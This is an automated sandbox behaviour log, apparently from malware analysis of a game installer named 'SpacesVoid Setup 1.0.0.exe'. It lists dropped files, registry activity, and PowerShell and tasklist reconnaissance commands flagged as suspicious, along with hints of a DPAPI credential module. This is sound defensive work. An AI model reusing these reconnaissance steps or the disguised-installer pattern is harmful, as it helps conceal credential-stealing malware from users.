Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\where.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq SpacesVoid.exe" /FO csv

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\e1611148-5250-504b-8870-9793aa65c9f1

Jump to behavior

Source: SpacesVoid Setup 1.0.0.exe

Static file information: File size 80211395 > 1048576

Source: SpacesVoid Setup 1.0.0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D3DCompiler_47.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2436234480.00000000051DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2437718962.00000000051D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D3DCompiler_47.pdbGCTL source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2436234480.00000000051DE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\electron.exe.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\dpapi\dpapi\build\Release\dpapi.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2544160582.00000000055B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2508988317.00000000051D5000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2395756562.0000000006B70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\node-sqlite3\node-sqlite3\build\Release\node_sqlite3.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2558203826.00000000057B9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2387038286.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2387317240.0000000005BB0000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2394763179.0000000006770000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

Source: ffmpeg.dll.0.dr	Static PE information: section name: .00cfg
Source: ffmpeg.dll.0.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr	Static PE information: section name: _RDATA
Source: libEGL.dll.0.dr	Static PE information: section name: .00cfg
Source: libEGL.dll.0.dr	Static PE information: section name: .gxfg
Source: libEGL.dll.0.dr	Static PE information: section name: .retplne
Source: libEGL.dll.0.dr	Static PE information: section name: _RDATA
Source: libGLESv2.dll.0.dr	Static PE information: section name: .00cfg
Source: libGLESv2.dll.0.dr	Static PE information: section name: .gxfg
Source: libGLESv2.dll.0.dr	Static PE information: section name: .retplne
Source: libGLESv2.dll.0.dr	Static PE information: section name: _RDATA
Source: SpacesVoid.exe.0.dr	Static PE information: section name: .00cfg
Source: SpacesVoid.exe.0.dr	Static PE information: section name: .gxfg
Source: SpacesVoid.exe.0.dr	Static PE information: section name: .retplne
Source: SpacesVoid.exe.0.dr	Static PE information: section name: .rodata
Source: SpacesVoid.exe.0.dr	Static PE information: section name: CPADinfo
Source: SpacesVoid.exe.0.dr	Static PE information: section name: LZMADEC
Source: SpacesVoid.exe.0.dr	Static PE information: section name: _RDATA
Source: SpacesVoid.exe.0.dr	Static PE information: section name: malloc_h
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: .retplne
Source: vk_swiftshader.dll.0.dr	Static PE information: section name: _RDATA
Source: vulkan-1.dll.0.dr	Static PE information: section name: .00cfg
Source: vulkan-1.dll.0.dr	Static PE information: section name: .gxfg
Source: vulkan-1.dll.0.dr	Static PE information: section name: .retplne
Source: vulkan-1.dll.0.dr	Static PE information: section name: _RDATA
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .00cfg
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll0.0.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll0.0.dr	Static PE information: section name: _RDATA
Source: libEGL.dll0.0.dr	Static PE information: section name: .00cfg
Source: libEGL.dll0.0.dr	Static PE information: section name: .gxfg
Source: libEGL.dll0.0.dr	Static PE information: section name: .retplne
Source: libEGL.dll0.0.dr	Static PE information: section name: _RDATA
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .00cfg
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .gxfg
Source: libGLESv2.dll0.0.dr	Static PE information: section name: .retplne
Source: libGLESv2.dll0.0.dr	Static PE information: section name: _RDATA
Source: SpacesVoid.exe0.0.dr	Static PE information: section name: .00cfg
Source: SpacesVoid.exe0.0.dr	Static PE information: section name: .gxfg
Source: SpacesVoid.exe0.0.dr	Static PE information: section name: .retplne
Source: SpacesVoid.exe0.0.dr	Static PE information: section name: .rodata
Source: SpacesVoid.exe0.0.dr	Static PE information: section name: CPADinfo
Source: SpacesVoid.exe0.0.dr	Static PE information: section name: LZMADEC
Source: SpacesVoid.exe0.0.dr	Static PE information: section name: _RDATA
Source: SpacesVoid.exe0.0.dr	Static PE information: section name: malloc_h
Source: node.napi.node.0.dr	Static PE information: section name: _RDATA
Source: node_sqlite3.node.0.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\elevate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\StdUtils.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\unrealgame\ffmpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\SpiderBanner.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\ffmpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.node	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\SpacesVoid.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\unrealgame\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\unrealgame\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\nsis7z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\unrealgame\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked\node_modules\ilovingcats\prebuilds\win32-x64\node.napi.node	Jump to dropped file

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked\node_modules\ilovingcats\prebuilds\win32-x64\node.napi.node			Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.node			Jump to dropped file

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\LICENSE.electron.txt			Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	File created: C:\Users\user\AppData\Local\Programs\unrealgame\LICENSE.electron.txt			Jump to behavior

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpacesVoid.lnk

Jump to behavior

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
